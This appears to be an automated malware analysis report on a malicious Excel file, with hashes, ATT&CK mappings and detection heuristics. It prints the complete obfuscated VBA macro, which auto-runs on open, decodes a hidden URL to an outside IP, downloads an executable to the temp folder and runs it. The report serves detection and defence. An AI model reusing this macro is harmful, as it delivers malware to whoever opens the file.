Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6017c6355af0aed…

MALICIOUS

Office (OLE)

24.0 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-01-04
MD5: 80e98b1dbc5af0e40e4fa0b96e181c14 SHA-1: 1b7ed31c380a33fc74ee64afefa3fc9302e52d19 SHA-256: e6017c6355af0aed24b70b62c8684842f715600e75df4b279c8653f428b6cae3
192 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates an obfuscated auto-exec VBA loader. The VBA script uses `CreateObject("MSXML2.XMLHTTP")` to download a file and `CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))` which decodes to `Shell.Application` to execute a file from the temporary directory, likely a second-stage payload.

Heuristics 8

  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3059 bytes
SHA-256: 7e94c6b28eb66ba054c3216714eca80c7be5857f824e046ac6c8f6dba0fd465d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Function rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta(ByVal gtretret As String) As String
  Dim i       As Long
  For i = 1 To Len(gtretret) Step 2

Dim MexzDXUy As Integer
MexzDXUy = 3
Do While MexzDXUy < 81
DoEvents: MexzDXUy = MexzDXUy + 1
Loop

  rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta & Chr$(Val("&H" & Mid$(gtretret, i, 2)))
  Next i
 End Function

Sub Auto_Open()
NGHDLXMAJBA
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Function IQQKFERUGKJ(ByVal RGZAGVPYQAW As String, ByVal HNGYJSJELUV As String) As Boolean
     Dim EYQNARIIOVP As Object, GUTUPYZSTWJ As Long, LJDEHVYKBYP As Long, VCAJTUXQHLA() As Byte

    Set EYQNARIIOVP = CreateObject("MSXML2.XMLHTTP")
    EYQNARIIOVP.Open "GET", RGZAGVPYQAW, False
    EYQNARIIOVP.Send "sdfggdgdfg"


    VCAJTUXQHLA = EYQNARIIOVP.responseBody

    LJDEHVYKBYP = FreeFile

    Open HNGYJSJELUV For Binary As #LJDEHVYKBYP
    Put #LJDEHVYKBYP, , VCAJTUXQHLA
    Close #LJDEHVYKBYP
    
Set GBIviviu67FUGBK = CreateObject(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("5368656C6C2E4170706C69636174696F6E"))
GBIviviu67FUGBK.Open Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Function
Sub NGHDLXMAJBA()
fdgBBBB = rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("687474703A2F2F32332E3232362E3232392E3131323A383038302F737461742F6C6C64762E706870")
    IQQKFERUGKJ fdgBBBB, Environ(rbkizoliygezfbhmgfzvwmcpuezoxivwzzcoypntpwiejslmhxtqlpfoscdmougmxtvyaaddmtetta("54454D50")) & "\VMHKWKMKEUQ.exe"
End Sub


Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.